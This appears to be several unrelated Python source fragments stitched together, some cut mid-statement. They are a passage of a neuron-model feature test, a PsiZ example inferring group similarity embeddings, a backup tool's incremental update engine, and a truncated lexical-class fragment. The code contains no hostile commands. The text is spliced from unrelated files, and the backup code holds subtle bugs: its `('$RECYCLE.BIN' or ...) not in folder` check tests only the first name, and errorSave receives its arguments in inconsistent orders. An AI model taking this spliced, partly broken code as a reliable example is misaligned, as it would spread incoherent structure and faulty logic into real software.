traces_results = pool.map(run_stim_, stimuli_list, chunksize=1)
#traces_results = traces_result.get()
pool.terminate()
pool.join()
del pool
pool2 = multiprocessing.Pool(self.npool, maxtasksperchild=1)
features_names, features_list = self.create_features_list(self.observation)
analyse_traces_ = functools.partial(self.analyse_traces, stimuli_list, traces_results)
feature_results = pool2.map(analyse_traces_, features_list, chunksize=1)
#feature_results = feature_result.get()
pool2.terminate()
pool2.join()
del pool2
feature_results_dict={}
for i in range (0,len(feature_results)):
feature_results_dict.update(feature_results[i]) #concatenate dictionaries
if self.specify_data_set != '':
specify_data_set = '_' + self.specify_data_set
else:
specify_data_set = self.specify_data_set
if self.base_directory:
self.path_results = self.base_directory + 'results/' + 'somaticfeat' + specify_data_set + '/' + model.name + '/'
else:
self.path_results = model.base_directory + 'results/' + 'somaticfeat' + specify_data_set + '/'
try:
if not os.path.exists(self.path_results):
os.makedirs(self.path_results)
except OSError as e:
if e.errno != 17:
raise
pass
file_name=self.path_results+'soma_features.p'
SomaFeaturesDict={}
SomaFeaturesDict['traces_results']=traces_results
SomaFeaturesDict['features_names']=features_names
SomaFeaturesDict['feature_results_dict']=feature_results_dict
SomaFeaturesDict['observation']=self.observation
if self.save_all:
pickle.dump(SomaFeaturesDict, gzip.GzipFile(file_name, "wb"))
plt.close('all') #needed to avoid overlapping of saved images when the test is run on multiple models in a for loop
self.create_figs(model, traces_results, features_names, feature_results_dict, self.observation)
#prediction = feature_results_dict
soma_features={}
needed_keys = { 'feature mean', 'feature sd'}
for i in range(len(SomaFeaturesDict['features_names'])):
feature_name = SomaFeaturesDict['features_names'][i]
soma_features[feature_name] = { key:value for key,value | |
# <gh_stars>0  (repository-scraper metadata artifact, not part of the source)
# -*- coding: utf-8 -*-
# Copyright 2020 The PsiZ Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Example that infers a shared embedding for three groups.
Fake data is generated from a ground truth model for three different
groups. In this example, these groups represent groups of agents with
varying levels of skill: novices, intermediates, and experts. Each group
has a different set of attention weights. An embedding model is
inferred from the simulated data and compared to the ground truth
model.
Results are saved in the directory specified by `fp_example`. By
default, a `psiz_examples` directory is created in your home directory.
Example output:
Attention weights:
Novice | [0.89 0.81 0.13 0.11]
Intermediate | [0.54 0.44 0.53 0.58]
Expert | [0.06 0.08 0.80 0.92]
Model Comparison (R^2)
================================
True | Inferred
| Novice Interm Expert
--------+-----------------------
Novice | 0.97 0.59 0.12
Interm | 0.64 0.98 0.60
Expert | 0.14 0.58 0.96
"""
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2" # noqa
from pathlib import Path
import shutil
import imageio
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from scipy.stats import pearsonr
import tensorflow as tf
import tensorflow_probability as tfp
import psiz
# Uncomment the following line to force eager execution.
# tf.config.run_functions_eagerly(True)
# Uncomment and edit the following to control GPU visibility.
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
# os.environ["CUDA_VISIBLE_DEVICES"] = "0"
def main():
    """Run script.

    Simulates rank-similarity judgments for three agent groups (novice,
    intermediate, expert), infers a variational embedding with
    group-specific kernels, and writes loss/R^2 figures (and optionally an
    animation) to `fp_example`.
    """
    # Settings.
    fp_example = Path.home() / Path('psiz_examples', 'rank', 'vi_3g')
    fp_board = fp_example / Path('logs', 'fit')
    n_stimuli = 30
    n_dim = 4
    n_group = 3
    n_trial = 2000
    epochs = 1000
    batch_size = 128
    n_frame = 1 # Set to 4 to observe convergence behavior.
    # Directory preparation.
    fp_example.mkdir(parents=True, exist_ok=True)
    # Remove existing TensorBoard logs.
    if fp_board.exists():
        shutil.rmtree(fp_board)
    # Plot settings.
    small_size = 6
    medium_size = 8
    large_size = 10
    plt.rc('font', size=small_size) # controls default text sizes
    plt.rc('axes', titlesize=medium_size)
    plt.rc('axes', labelsize=small_size)
    plt.rc('xtick', labelsize=small_size)
    plt.rc('ytick', labelsize=small_size)
    plt.rc('legend', fontsize=small_size)
    plt.rc('figure', titlesize=large_size)
    model_true = ground_truth(n_stimuli, n_dim, n_group)
    # Compute ground truth similarity matrices.
    simmat_truth = (
        model_similarity(model_true, groups=[0]),
        model_similarity(model_true, groups=[1]),
        model_similarity(model_true, groups=[2])
    )
    # Generate a random docket of trials to show each group.
    generator = psiz.trials.RandomRank(
        n_stimuli, n_reference=8, n_select=2
    )
    docket = generator.generate(n_trial)
    # Create virtual agents for each group.
    agent_novice = psiz.agents.RankAgent(model_true, groups=[0])
    agent_interm = psiz.agents.RankAgent(model_true, groups=[1])
    agent_expert = psiz.agents.RankAgent(model_true, groups=[2])
    # Simulate similarity judgments for each group.
    obs_novice = agent_novice.simulate(docket)
    obs_interm = agent_interm.simulate(docket)
    obs_expert = agent_expert.simulate(docket)
    obs = psiz.trials.stack((obs_novice, obs_interm, obs_expert))
    # Partition observations into 80% train, 10% validation and 10% test set.
    obs_train, obs_val, obs_test = psiz.utils.standard_split(obs)
    # Convert observations to TF dataset.
    ds_obs_val = obs_val.as_dataset().batch(
        batch_size, drop_remainder=False
    )
    ds_obs_test = obs_test.as_dataset().batch(
        batch_size, drop_remainder=False
    )
    compile_kwargs = {
        'loss': tf.keras.losses.CategoricalCrossentropy(),
        # NOTE(review): `lr` is the legacy alias; newer tf.keras spells it
        # `learning_rate`.
        'optimizer': tf.keras.optimizers.Adam(lr=.001),
        'weighted_metrics': [
            tf.keras.metrics.CategoricalCrossentropy(name='cce')
        ]
    }
    # Infer independent models with increasing amounts of data.
    if n_frame == 1:
        n_obs = np.array([obs_train.n_trial], dtype=int)
    else:
        n_obs = np.round(
            np.linspace(15, obs_train.n_trial, n_frame)
        ).astype(np.int64)
    # Per-frame metric buffers; NaN marks frames not yet run.
    r2 = np.empty([n_frame, n_group, n_group]) * np.nan
    train_loss = np.empty((n_frame)) * np.nan
    val_loss = np.empty((n_frame)) * np.nan
    test_loss = np.empty((n_frame)) * np.nan
    for i_frame in range(n_frame):
        # Train on a growing prefix of the training observations.
        include_idx = np.arange(0, n_obs[i_frame])
        obs_round_train = obs_train.subset(include_idx)
        ds_obs_round_train = obs_round_train.as_dataset().shuffle(
            buffer_size=obs_round_train.n_trial, reshuffle_each_iteration=True
        ).batch(batch_size, drop_remainder=False)
        print(
            '\n Frame {0} ({1} obs)'.format(i_frame, obs_round_train.n_trial)
        )
        # Define model.
        kl_weight = 1. / obs_round_train.n_trial
        model_inferred = build_model(n_stimuli, n_dim, n_group, kl_weight)
        # Define callbacks.
        fp_board_frame = fp_board / Path('frame_{0}'.format(i_frame))
        cb_board = psiz.keras.callbacks.TensorBoardRe(
            log_dir=fp_board_frame, histogram_freq=0,
            write_graph=False, write_images=False, update_freq='epoch',
            profile_batch=0, embeddings_freq=0, embeddings_metadata=None
        )
        cb_early = psiz.keras.callbacks.EarlyStoppingRe(
            'loss', patience=10, mode='min', restore_best_weights=False,
            verbose=1
        )
        callbacks = [cb_board, cb_early]
        # Infer model.
        model_inferred.compile(**compile_kwargs)
        history = model_inferred.fit(
            ds_obs_round_train, validation_data=ds_obs_val, epochs=epochs,
            callbacks=callbacks, verbose=0
        )
        train_loss[i_frame] = history.history['loss'][-1]
        val_loss[i_frame] = history.history['val_loss'][-1]
        tf.keras.backend.clear_session()
        # Evaluate on the test split using more posterior samples.
        model_inferred.n_sample = 100
        model_inferred.compile(**compile_kwargs)
        test_metrics = model_inferred.evaluate(
            ds_obs_test, verbose=0, return_dict=True
        )
        test_loss[i_frame] = test_metrics['loss']
        # Compare the inferred model with ground truth by comparing the
        # similarity matrices implied by each model.
        simmat_inferred = (
            model_similarity(model_inferred, groups=[0], n_sample=100),
            model_similarity(model_inferred, groups=[1], n_sample=100),
            model_similarity(model_inferred, groups=[2], n_sample=100)
        )
        for i_truth in range(n_group):
            for j_infer in range(n_group):
                rho, _ = pearsonr(
                    simmat_truth[i_truth], simmat_inferred[j_infer]
                )
                r2[i_frame, i_truth, j_infer] = rho**2
        # Display attention weights.
        attention_weight = tf.stack(
            [
                model_inferred.kernel.subnets[0].distance.w.mode(),
                model_inferred.kernel.subnets[1].distance.w.mode(),
                model_inferred.kernel.subnets[2].distance.w.mode()
            ],
            axis=0
        ).numpy()
        # Permute inferred dimensions to best match ground truth.
        idx_sorted = np.argsort(-attention_weight[0, :])
        attention_weight = attention_weight[:, idx_sorted]
        group_labels = ["Novice", "Intermediate", "Expert"]
        print("\n Attention weights:")
        for i_group in range(n_group):
            print(" {0:>12} | {1}".format(
                group_labels[i_group],
                np.array2string(
                    attention_weight[i_group, :],
                    formatter={'float_kind': lambda x: "%.2f" % x})
                )
            )
        # Display comparison results. A good inferred model will have a high
        # R^2 value on the diagonal elements (max is 1) and relatively low R^2
        # values on the off-diagonal elements.
        print('\n Model Comparison (R^2)')
        print(' ================================')
        print(' True | Inferred')
        print(' | Novice Interm Expert')
        print(' --------+-----------------------')
        print(' Novice | {0: >6.2f} {1: >6.2f} {2: >6.2f}'.format(
            r2[i_frame, 0, 0], r2[i_frame, 0, 1], r2[i_frame, 0, 2]))
        print(' Interm | {0: >6.2f} {1: >6.2f} {2: >6.2f}'.format(
            r2[i_frame, 1, 0], r2[i_frame, 1, 1], r2[i_frame, 1, 2]))
        print(' Expert | {0: >6.2f} {1: >6.2f} {2: >6.2f}'.format(
            r2[i_frame, 2, 0], r2[i_frame, 2, 1], r2[i_frame, 2, 2]))
        print('\n')
        # Create and save visual frame.
        fig0 = plt.figure(figsize=(12, 5), dpi=200)
        plot_frame(
            fig0, n_obs, train_loss, val_loss, test_loss, r2, model_true,
            model_inferred, idx_sorted, i_frame
        )
        fname = fp_example / Path('frame_{0}.tiff'.format(i_frame))
        plt.savefig(
            os.fspath(fname), format='tiff', bbox_inches="tight", dpi=300
        )
    # Create animation.
    if n_frame > 1:
        frames = []
        for i_frame in range(n_frame):
            fname = fp_example / Path('frame_{0}.tiff'.format(i_frame))
            frames.append(imageio.imread(fname))
        imageio.mimwrite(fp_example / Path('evolution.gif'), frames, fps=1)
def ground_truth(n_stimuli, n_dim, n_group):
    """Return a ground truth embedding.

    Builds a Rank model with one shared (frozen) exponential similarity
    and three group-specific Minkowski kernels that differ only in their
    fixed attention weights. `n_group` is accepted for signature symmetry
    with `build_model`; the model always has three kernels.
    """
    stimuli = tf.keras.layers.Embedding(
        n_stimuli+1, n_dim, mask_zero=True,
        embeddings_initializer=tf.keras.initializers.RandomNormal(
            stddev=.17, seed=58
        )
    )
    shared_similarity = psiz.keras.layers.ExponentialSimilarity(
        trainable=False,
        beta_initializer=tf.keras.initializers.Constant(10.),
        tau_initializer=tf.keras.initializers.Constant(1.),
        gamma_initializer=tf.keras.initializers.Constant(0.)
    )

    def _group_kernel(attention_w):
        # One fixed-rho Minkowski kernel; `attention_w` encodes how strongly
        # the group attends to each embedding dimension.
        return psiz.keras.layers.DistanceBased(
            distance=psiz.keras.layers.Minkowski(
                rho_trainable=False,
                rho_initializer=tf.keras.initializers.Constant(2.),
                w_initializer=tf.keras.initializers.Constant(attention_w),
                w_constraint=psiz.keras.constraints.NonNegNorm(
                    scale=n_dim, p=1.
                ),
            ),
            similarity=shared_similarity
        )

    # Novice / intermediate / expert attention profiles.
    kernel_group = psiz.keras.layers.GateMulti(
        subnets=[
            _group_kernel([1.8, 1.8, .2, .2]),
            _group_kernel([1., 1., 1., 1.]),
            _group_kernel([.2, .2, 1.8, 1.8]),
        ],
        group_col=0
    )
    model = psiz.keras.models.Rank(
        stimuli=stimuli, kernel=kernel_group, use_group_kernel=True
    )
    return model
def build_model(n_stimuli, n_dim, n_group, kl_weight):
    """Build model.

    Arguments:
        n_stimuli: Integer indicating the number of stimuli in the
            embedding.
        n_dim: Integer indicating the dimensionality of the embedding.
        n_group: Integer indicating the number of groups.
        kl_weight: Float indicating the KL weight for variational
            inference.

    Returns:
        model: A TensorFlow Keras model.
    """
    prior_scale = .2
    # Inverse-softplus of the prior scale, reused by posterior and prior.
    raw_scale = tfp.math.softplus_inverse(prior_scale).numpy()

    posterior = psiz.keras.layers.EmbeddingNormalDiag(
        n_stimuli+1, n_dim, mask_zero=True,
        scale_initializer=tf.keras.initializers.Constant(raw_scale)
    )
    prior = psiz.keras.layers.EmbeddingShared(
        n_stimuli+1, n_dim, mask_zero=True,
        embedding=psiz.keras.layers.EmbeddingNormalDiag(
            1, 1,
            loc_initializer=tf.keras.initializers.Constant(0.),
            scale_initializer=tf.keras.initializers.Constant(raw_scale),
            loc_trainable=False
        )
    )
    stimuli = psiz.keras.layers.EmbeddingVariational(
        posterior=posterior, prior=prior,
        kl_weight=kl_weight, kl_n_sample=30
    )

    # Frozen similarity shared by the three group-specific VI kernels.
    similarity = psiz.keras.layers.ExponentialSimilarity(
        beta_initializer=tf.keras.initializers.Constant(10.),
        tau_initializer=tf.keras.initializers.Constant(1.),
        gamma_initializer=tf.keras.initializers.Constant(0.),
        trainable=False
    )
    kernels = [build_vi_kernel(similarity, n_dim, kl_weight) for _ in range(3)]
    kernel_group = psiz.keras.layers.GateMulti(subnets=kernels, group_col=0)

    model = psiz.keras.models.Rank(
        stimuli=stimuli, kernel=kernel_group, use_group_kernel=True
    )
    return model
def build_vi_kernel(similarity, n_dim, kl_weight):
    """Assemble a variational, distance-based kernel for a single group.

    The Minkowski distance gets a fixed-location prior and a trainable
    posterior (weights constrained to a non-negative L1 ball); the
    similarity function is supplied by the caller.
    """
    prior = psiz.keras.layers.MinkowskiStochastic(
        rho_loc_trainable=False, rho_scale_trainable=True,
        w_loc_trainable=False, w_scale_trainable=False,
        w_scale_initializer=tf.keras.initializers.Constant(.1)
    )
    posterior = psiz.keras.layers.MinkowskiStochastic(
        rho_loc_trainable=False, rho_scale_trainable=True,
        w_loc_trainable=True, w_scale_trainable=True,
        w_scale_initializer=tf.keras.initializers.Constant(.1),
        w_loc_constraint=psiz.keras.constraints.NonNegNorm(
            scale=n_dim, p=1.
        )
    )
    distance = psiz.keras.layers.MinkowskiVariational(
        prior=prior, posterior=posterior,
        kl_weight=kl_weight, kl_n_sample=30
    )
    return psiz.keras.layers.DistanceBased(
        distance=distance,
        similarity=similarity
    )
def plot_frame(
fig0, n_obs, train_loss, val_loss, test_loss, r2, model_true,
model_inferred, idx_sorted, i_frame):
"""Plot posteriors."""
# Settings.
group_labels = ['Novice', 'Intermediate', 'Expert']
n_group = len(group_labels)
n_dim = model_inferred.n_dim
gs = fig0.add_gridspec(n_group + 1, n_dim)
f0_ax0 = fig0.add_subplot(gs[0, 0:2])
plot_loss(f0_ax0, n_obs, train_loss, val_loss, test_loss)
f0_ax1 = fig0.add_subplot(gs[0, 2])
plot_convergence(fig0, f0_ax1, n_obs, r2[i_frame])
for i_group in range(n_group):
if i_group == 0:
c = 'r'
elif i_group == 1:
c = 'b'
elif i_group == 2:
c = 'g'
for i_dim in range(n_dim):
name = 'w'
ax = fig0.add_subplot(gs[i_group + 1, | |
# Repository: anjalp/Project-Ultra-Backup
import os
import json
import shutil
import copy
import time
import random
import string
import createSimple as cS
# Module-wide metadata placeholders; initialised to 0 and assigned their
# real string values by globalVariable().
ver_control = 0
software_name = 0
creator = 0
def globalVariable(ver="v1.1.0", soft_name="Project Ultra Backup", author="Anjal.P"):
    """Set the module-wide version/name/author globals and return them.

    Called with no arguments it (re)sets the globals to their defaults,
    acting as a read accessor for the rest of the module.
    """
    global ver_control, software_name, creator
    ver_control, software_name, creator = ver, soft_name, author
    return ver_control, software_name, creator
def errorSave(where_to_save, error_report, root_directory):
    """Append a human-readable error report to "Error Report UB.txt".

    Args:
        where_to_save: Directory in which the report file is written.
        error_report: dict mapping a short error label to its detail text.
        root_directory: Path shown in the report header (the operation
            that was running when the error occurred).

    Returns:
        None. If even the report file cannot be written, the report is
        printed to stdout instead.
    """
    where_to_save = where_to_save + "//"
    report_path = where_to_save + "Error Report UB.txt"
    print("Error::")
    print("look at: ", report_path)
    ver_control, software_name, creator = globalVariable()
    now = time.localtime(time.time())
    date_error = str(now.tm_mday) + "." + str(now.tm_mon) + "." + str(now.tm_year)
    # Original behavior preserved: a fresh report file is labelled
    # "Restore", an existing one "Backup".
    # NOTE(review): this mapping looks arbitrary/inverted — confirm intent.
    run_label = "Restore" if not os.path.exists(report_path) else "Backup"
    try:
        with open(report_path, 'a') as error_file:
            error_file.write("--"*50 + "\n")
            error_file.write("On Running " + run_label + ": " + root_directory + "\n")
            error_file.write("Created On: " + date_error + "\n")
            error_file.write("Report: \n")
            for eachError in error_report:
                error_file.write(" > " + eachError + " " + error_report[eachError] + "\n")
            error_file.write("This is an automated report generated by " + str(software_name) + " " + str(ver_control) + " " + "Author: " + str(creator) + "\n")
            error_file.write("--"*50 + "\n")
    except Exception as e:
        # FIX: the original second branch used a bare `except:` and then
        # referenced an undefined `e`, raising NameError on this path.
        print("Error even creating the error log .txt at: " + report_path)
        print("Error Report: " + str(error_report))
        print("Error on errorSave: " + str(e))
    return
def directoryScan(root_directory):
    """Scan the top level of root_directory (non-recursive).

    Side effect: changes the process working directory to
    root_directory (later relative-path checks rely on this).

    Args:
        root_directory: Path of the directory to scan.

    Returns:
        tuple: (root_folders, root_files, files_properties) where
            root_folders: dict {index: sub-folder name}
            root_files: dict {index: file name}
            files_properties: dict {file index: [st_size, st_atime,
                st_mtime, st_ctime]} taken from os.stat.
        All three dicts are empty when the directory does not exist.
    """
    root_folders = {}
    folder_no = 0
    root_files = {}
    file_no = 0
    files_properties = {}
    if not os.path.isdir(root_directory):
        print("No such Directory exist.....")
    else:
        os.chdir(root_directory)
        for each_obj in os.listdir(root_directory):
            if os.path.isfile(each_obj):
                root_files[file_no] = each_obj
                # Keep only size/atime/mtime/ctime (stat fields 6..9);
                # used to detect modified files between backup runs.
                files_properties[file_no] = list(os.stat(each_obj))[6:]
                file_no = file_no + 1
            elif os.path.isdir(each_obj):
                root_folders[folder_no] = each_obj
                folder_no += 1
    return root_folders, root_files, files_properties
def updateEngine(root_directory, backup_folder, folder_scan):
    """Incrementally synchronise backup_folder with the current scan.

    Diffs folder_scan against the previous manifest (the "UB_*.UBs"
    JSON file in the backup), then:
      * moves files that vanished from the source into a dated
        "UB_Archive" folder,
      * copies new/changed files into the backup,
      * replaces the old .UBs manifest with one built from folder_scan.

    Args:
        root_directory: Source directory being backed up.
        backup_folder: Destination root (caller passes a trailing "//").
        folder_scan: dict keyed by relative folder path; each value holds
            "fo_s" (sub-folder names), "fi_s" (file names) and "fi_p"
            (per-file [size, atime, mtime, ctime]) as produced by
            directoryScan().

    Returns:
        None. Failures are reported through errorSave().
    """
    new_files = {}
    old_files = {}
    errorReport = {}
    # NOTE(review): errorReport keys are reused across failures, so a later
    # error overwrites an earlier one before errorSave() runs — confirm.
    ubs_attendence = 0  # becomes 1 once a previous .UBs manifest is found
    date = str(time.localtime(time.time()).tm_mday) + "." + str(time.localtime(time.time()).tm_mon) + "." + str(time.localtime(time.time()).tm_year)
    rand_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
    basename = os.path.basename(root_directory)
    # No previous backup of this source: fall back to a full copy.
    if os.path.isdir(backup_folder + basename)==False:
        print("Sorry, there is no previous Backup Record, Creating a New Backup.")
        try:
            cS.createSimpleBackup(root_directory, backup_folder)
        except Exception as e:
            errorReport["er_createSimpleBackup"] = root_directory + " to " + backup_folder
            errorReport["Exception: "] = str(e)
            errorSave(root_directory, errorReport, backup_folder)
        return
    # Locate and load the previous manifest (first UB_*.UBs file found).
    for allFiles in os.listdir(backup_folder + basename):
        if allFiles[:3]=="UB_" and allFiles[-4:]==".UBs":
            ubfileName = allFiles
            ubs_attendence = 1
            try:
                with open(backup_folder + basename + "//" + allFiles, 'r') as prevUB:
                    prev_data = json.load(prevUB)
                    prevUB.close()
            except Exception as e:
                # NOTE(review): if this open/parse fails, ubs_attendence is
                # already 1 but prev_data is never bound, so the deepcopy
                # below raises NameError — confirm intended flow.
                errorReport["er_open_UBs"] = backup_folder + basename + "//" + allFiles
                errorReport["Error: "] = str(e)
                errorSave(root_directory, errorReport, backup_folder)
            break
    if ubs_attendence==0:
        print("No .UBs found, so Update Cannot Proceed.")
        print("Creating a New Backup: ")
        try:
            cS.createSimpleBackup(root_directory, backup_folder)
        except Exception as e:
            errorReport["er_createSimpleBackup"] = root_directory + " to " + backup_folder
            errorReport["Exception: "] = str(e)
            errorSave(root_directory, errorReport, backup_folder)
        return
    # new_files: entries in the current scan not matched in the previous
    # manifest; old_files: entries in the manifest not matched in the scan.
    new_files = copy.deepcopy(folder_scan)
    old_files = copy.deepcopy(prev_data)
    for eachfoldr in folder_scan:
        if eachfoldr in prev_data.keys():
            # Drop sub-folders that already exist in the previous backup.
            for fold in folder_scan[eachfoldr]["fo_s"]:
                if folder_scan[eachfoldr]["fo_s"][fold] in prev_data[eachfoldr]["fo_s"].values():
                    new_files[eachfoldr]["fo_s"].pop(fold)
            # Drop files whose name AND size/mtime/ctime (fi_p indices
            # 0, 2, 3; atime at index 1 is ignored) are unchanged.
            for eachFiles in folder_scan[eachfoldr]["fi_s"]:
                if folder_scan[eachfoldr]["fi_s"][eachFiles] in prev_data[eachfoldr]["fi_s"].values():
                    key = list(prev_data[eachfoldr]["fi_s"].keys())[list(prev_data[eachfoldr]["fi_s"].values()).index(folder_scan[eachfoldr]["fi_s"][eachFiles])]
                    if folder_scan[eachfoldr]["fi_p"][eachFiles][0] == prev_data[eachfoldr]["fi_p"][key][0] and folder_scan[eachfoldr]["fi_p"][eachFiles][2] == prev_data[eachfoldr]["fi_p"][key][2] and folder_scan[eachfoldr]["fi_p"][eachFiles][3] == prev_data[eachfoldr]["fi_p"][key][3]:
                        new_files[eachfoldr]["fi_s"].pop(eachFiles)
                        new_files[eachfoldr]["fi_p"].pop(eachFiles)
    # to_backup: only the folders that still have something new in them.
    to_backup = copy.deepcopy(new_files)
    for each in new_files:
        if len(new_files[each]["fi_s"])==0 and len(new_files[each]["fo_s"])==0:
            to_backup.pop(each)
    # Mirror of the diff above, from the previous manifest's point of view.
    for preveach in prev_data:
        if preveach in folder_scan.keys():
            for foldroot in prev_data[preveach]["fo_s"]:
                if prev_data[preveach]["fo_s"][foldroot] in folder_scan[preveach]["fo_s"].values():
                    old_files[preveach]["fo_s"].pop(foldroot)
            for eachfiles in prev_data[preveach]["fi_s"]:
                if prev_data[preveach]["fi_s"][eachfiles] in folder_scan[preveach]["fi_s"].values():
                    key = list(folder_scan[preveach]["fi_s"].keys())[list(folder_scan[preveach]["fi_s"].values()).index(prev_data[preveach]["fi_s"][eachfiles])]
                    if prev_data[preveach]["fi_p"][eachfiles][0] ==folder_scan[preveach]["fi_p"][key][0] and prev_data[preveach]["fi_p"][eachfiles][2] ==folder_scan[preveach]["fi_p"][key][2] and prev_data[preveach]["fi_p"][eachfiles][3] ==folder_scan[preveach]["fi_p"][key][3]:
                        old_files[preveach]["fi_s"].pop(eachfiles)
                        old_files[preveach]["fi_p"].pop(eachfiles)
    # to_archieve: folders with files/sub-folders that vanished from source.
    to_archieve = copy.deepcopy(old_files)
    for each in old_files:
        if len(old_files[each]["fi_s"])==0 and len(old_files[each]["fo_s"])==0:
            to_archieve.pop(each)
    if len(to_archieve)==0:
        print("No file to Archive")
    else:
        print("Found some files to Archive.")
        # Create the dated archive root, e.g. <backup>/UB_Archive/<d.m.y>.
        if os.path.isdir(backup_folder + "UB_Archive" + "//" + date)==False:
            try:
                os.makedirs(backup_folder + "UB_Archive" + "//" + date)
            except Exception as e:
                errorReport["er_create_UB archieve"] = backup_folder + "UB_Archive" + "//" + date
                errorReport["Error: "] = str(e)
                print("Archive folder cannot be made...")
                errorSave(root_directory, errorReport, backup_folder)
                return
        # Move each obsolete file out of the backup into the archive,
        # preserving its relative folder structure.
        for archievefolder in to_archieve:
            if os.path.isdir(backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder)==False:
                os.makedirs(backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder)
            for filesMove in to_archieve[archievefolder]["fi_s"]:
                if os.path.isfile(backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove])==True:
                    try:
                        shutil.move(backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove], backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder + "//")
                    except Exception as e:
                        errorReport["er_moving: "] = backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove] + " to " + backup_folder + "UB_Archive" + "//" + date + "//" + archievefolder + "//"
                        errorReport["Error: "] = str(e)
                        errorSave(root_directory, errorReport, backup_folder)
                    #print(".", end='', flush=True) # old version v1.0.0
                    #UPDATE FOR FEATURE ENHANCEMENT ON v1.1.0
                    #This displays the file that is currently backuped, from the previously used . for each file backuped.
                    print("Archive: " + backup_folder + archievefolder + "//" + to_archieve[archievefolder]["fi_s"][filesMove], flush=True)
        # Remove backup folders whose source folder no longer exists.
        for delFolder in old_files:
            if os.path.isdir(backup_folder + delFolder)==True:
                if delFolder not in folder_scan:
                    try:
                        shutil.rmtree(backup_folder + delFolder)
                    except Exception as e:
                        errorReport["er_remove directory: "] = backup_folder + delFolder
                        errorReport["Error: "] = str(e)
                        errorSave(root_directory, errorReport, backup_folder)
        # Record what was archived in a .UBar manifest alongside the archive.
        # NOTE(review): the <date>/<basename> sub-folder is not created
        # above unless basename itself was archived, so this open can fail
        # and be routed to errorSave — confirm intended.
        try:
            with open(backup_folder + "UB_Archive" + "//" + date + "//" + basename + "//" + "UB_" + date + ".UBar", 'w') as archUB:
                json.dump(to_archieve, archUB)
                archUB.close()
        except Exception as e:
            errorReport["er_create_UBs"] = backup_folder + "UB_Archive" + "//" + date + "//" + basename + "//" + "UB_" + date + ".UBar"
            errorReport["Error: "] = str(e)
            errorSave(root_directory, errorReport, backup_folder)
    if len(to_backup)==0:
        print("No new Files to Backup")
    else:
        print("Found Some Files to Backup")
        # Strip the basename so relative paths in to_backup resolve
        # against the source parent directory.
        root_directory = root_directory.replace(basename, '')
        for copyNew in to_backup:
            if os.path.isdir(backup_folder + copyNew + "//")==False:
                try:
                    os.makedirs(backup_folder + copyNew + "//")
                except Exception as e:
                    errorReport["er_create_folder: "] = backup_folder + copyNew + "//"
                    errorReport["Error: "] = str(e)
                    errorSave(root_directory, errorReport, backup_folder)
            # Copy each new/changed file and replicate its stat metadata
            # (copystat keeps mtime/ctime comparisons valid on later runs).
            for filesCopy in to_backup[copyNew]["fi_s"]:
                try:
                    shutil.copy(root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy], backup_folder + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy])
                    shutil.copystat(root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy], backup_folder + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy])
                except Exception as e:
                    errorReport["er_copy_files: "] = root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy] + " to " + backup_folder + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy]
                    errorReport["Error: "] = str(e)
                    errorSave(root_directory, errorReport, backup_folder)
                #print(".", end='', flush=True) #old version v1.0.0
                #UPDATE FOR FEATURE ENHANCEMENT ON v1.1.0
                #This displays the file that is currently backuped, from the previously used . for each file backuped.
                print("Backup: " + root_directory + "//" + copyNew + "//" + to_backup[copyNew]["fi_s"][filesCopy], flush=True)
    # Replace the old manifest with one describing the current scan.
    try:
        os.remove(backup_folder + basename + "//" + ubfileName)
    except Exception as e:
        errorReport["er_remove_oldUBs: "] = backup_folder + basename + "//" + ubfileName
        errorReport["Error: "] = str(e)
        errorSave(root_directory, errorReport, backup_folder)
    try:
        with open(backup_folder + basename + "//" + "UB_" + rand_name + "_" + date + ".UBs", 'w') as ubFiles:
            json.dump(folder_scan, ubFiles)
            ubFiles.close()
    except Exception as e:
        errorReport["er_create_NewUBs: "] = backup_folder + basename + "//" + "UB_" + rand_name + "_" + date + ".UBs"
        errorReport["Error: "] = str(e)
        errorSave(root_directory, errorReport, backup_folder)
    return
def updateBackup(root_directory, backup_folder):
errorReport = {}
folder_det = {}
ubname = str(time.localtime(time.time()).tm_mday) + "." + str(time.localtime(time.time()).tm_mon) + "." + str(time.localtime(time.time()).tm_year)
rand_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
basefolder = os.path.basename(root_directory)
split = root_directory.split("//")
index_basefolder = split.index(basefolder)
elim_sec = '//'.join(split[:index_basefolder]) + '//'
for folder, subfolder, files in os.walk(root_directory):
if ("$RECYCLE.BIN" or "found.000" or "System Volume Information") not in folder:
mod_folder = (folder.replace("\\", "//")).replace(elim_sec, '')
folder_det[mod_folder] = {}
try:
folder_det[mod_folder]["fo_s"], folder_det[mod_folder]["fi_s"], folder_det[mod_folder]["fi_p"] = directoryScan(folder.replace("\\", "//") + "//")
except Exception as e:
errorReport["er_directoryScan"] = folder.replace("\\", "//")
errorReport["Exception: "] = str(e)
errorSave(root_directory, errorReport, root_directory)
try:
updateEngine(root_directory, backup_folder + "//", folder_det)
except Exception as e:
errorReport["er_updateEngine_file"] =root_directory + | |
**kwargs):
self._subjected = sbj
self._verbed = self._subjected.lex.root_lex[vrb] # TODO: Move to ... (?)
self._args = list(args)
self._kwargs = kwargs
def __setitem__(self, key, value):
    """
    Square-bracket sentence insert (the C in CRUD).

    Completes the expression:
        lex[s](v)[o] = n,t
    i.e. the assignment combined with the right-most square-bracket
